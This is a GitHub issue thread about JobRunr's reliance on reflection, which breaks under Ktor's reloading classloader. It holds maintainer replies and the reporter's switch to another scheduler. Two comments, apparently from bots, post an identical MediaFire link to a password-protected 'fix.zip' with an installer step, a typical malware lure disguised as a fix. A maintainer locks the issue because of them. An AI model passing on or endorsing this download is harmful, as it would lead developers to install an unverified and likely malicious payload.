### ISSUE TITLE
[Feature][Blocking] Don't do reflection to create/run jobs

### ISSUE THREAD

**Issue by chrisjenx** [jobrunr/jobrunr#1102]
**Is your feature request related to a problem? Please describe.**

We generate instances using a dynamic class loader for development (allows reloading). But we get two issues either we can get the class from our DI and get `Method` related issues where the instances don't match.

```
java.lang.IllegalArgumentException: object is not an instance of declaring class
	at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.checkReceiver(DirectMethodHandleAccessor.java:197)
	at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:99)
	at java.base/java.lang.reflect.Method.invoke(Method.java:580)
	at org.jobrunr.server.runner.AbstractBackgroundJobRunner$BackgroundJobWorker.invokeJobMethod(AbstractBackgroundJobRunner.java:65)
	at org.jobrunr.server.runner.AbstractBackgroundJobRunner$BackgroundJobWorker.run(AbstractBackgroundJobRunner.java:39)
```

Or if we create the instance using the classpath from the provide `Class<T>` object then we get class loader issues further down the road for other injected classes further down the rabbit hole:

```
class co.haynet.jobs.EventFinalizerJob cannot be cast to class co.haynet.jobs.EventFinalizerJob (co.haynet.jobs.EventFinalizerJob is in unnamed module of loader io.ktor.server.engine.OverridingClassLoader$ChildURLClassLoader @1efe439d; co.haynet.jobs.EventFinalizerJob is in unnamed module of loader 'app')
```

**Describe the solution you'd like**
- Manual job callback with the jobDdetails so I can decide how I want to run the job based on the details (no reflection done by JobRunr)
- Or a job id and serializable object so I can work out what job to run based on params and key
- Or give me the job details to construct the class and method for you on my classpath

**Describe alternatives you've considered**
I've tried basically everything at this point, the classloader issue makes the project unusable for me. 

**Additional context**

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by auloin** [comment]
Sorry, I had to lock this issue because of the bots. We may unlock later.

**Comment by rdehuyss** [comment]
Hi @chrisjenx - I'm afraid that Reflection is at the heart of JobRunr and we do not tend to change that. 

We evaluated whether we can open up the API by exposing the `BackgroundJobRunner` API and making it extensible via a `ServiceLoader` but the impact is too big (e.g. JobRunr validates whether a job exists also on startup of the `BackgroundJobServer` using Reflection, when the Job is created using the `JobBuilder`, ...).

To be honest, we have many Kotlin users that all use ktor using development mode (for reloading) who do not have this issue. I think your issue may be related to https://github.com/InsertKoinIO/koin/issues/1363.

**Comment by rdehuyss** [comment]
If you're up for a small challenge, you can create your own `BackgroundJobPerformer` and plug it into JobRunr using the `ServiceLoader` API but you will need to make sure that you do all the necessary steps yourself.

**Comment by chrisjenx** [comment]
Turning off development mode does work. But not a great work around especially when developing.

Can look at the job performer I guess, but relying on reflection so strongly without more generic job scheduling is huge turn off.

If you want to be an Enterprise product, flexibility with job running is a must, only supporting lambdas will be a blocker for many large orgs, it's literally been the biggest pain point in trying to test the product and failing because it's trying to do to much when I just want simple callbacks.

**Comment by rdehuyss** [comment]
Just as an FYI, you do not need to use Java 8 lambda's, you can also use the `JobRequest` and `JobRequestHandler`.

**Comment by chrisjenx** [comment]
Tried that to. Still the same problem. As the expected class and method still run through the same logic. (Instance method mismatch)

I'm wondering if the smallest change would be providing an override for JobDetails -> Class / Method

E.g. the job activator has two overloads. The regular one for the service locator and then an overridable `toClass(jobdetails): Class` or similar, something that would enable us to generate the right Class.

As really the only issue is that the the `toClass` that is built for Method is a different "instance" to what you expect for the Method invocation. 

Or even an override to something like `toMethod(details): Callable` would be great to. I can create the callable/runnable from the job details.

Thoughts?

**Comment by rdehuyss** [comment]
Don't take me wrong, but we already spent 8 hours today on this feature request only (2 developers looking into this for 4 hours into all corner cases).

Adding this feature would not help a lot of JobRunr users as we have 125k downloads / month and this was never requested before. Only 2% of this 125k downloads is using Kotlin (about 2500) and we never received this request so this may be related how you want to run your jobs.

To conclude, we can add this but only if you take a Pro subscription. I want to make sure we spend our time on JobRunr (OSS and Pro) wisely.

**Comment by chrisjenx** [comment]
I'll either fork or use something else, already wasted too much time fighting an inflexible API

**Comment by danmouracunha** [comment]
Damn

**Comment by chrisjenx** [comment]
@danmouracunha I'm using https://github.com/kagkarlsson/db-scheduler now, works nicely with Kotlin/Ktor and existing infrastructure. Been running in prod 1000s of jobs a day since last year.

**Comment by danmouracunha** [comment]
@chrisjenx I took a look at it. it looks nice although it has 72 issues open. have you noticed anything odd about that lib?

**Comment by chrisjenx** [comment]
> @chrisjenx I took a look at it. it looks nice although it has 72 issues open. have you noticed anything odd about that lib?

Seems solid for me, I have simpler use cases tho, not noticed any bugs or issues
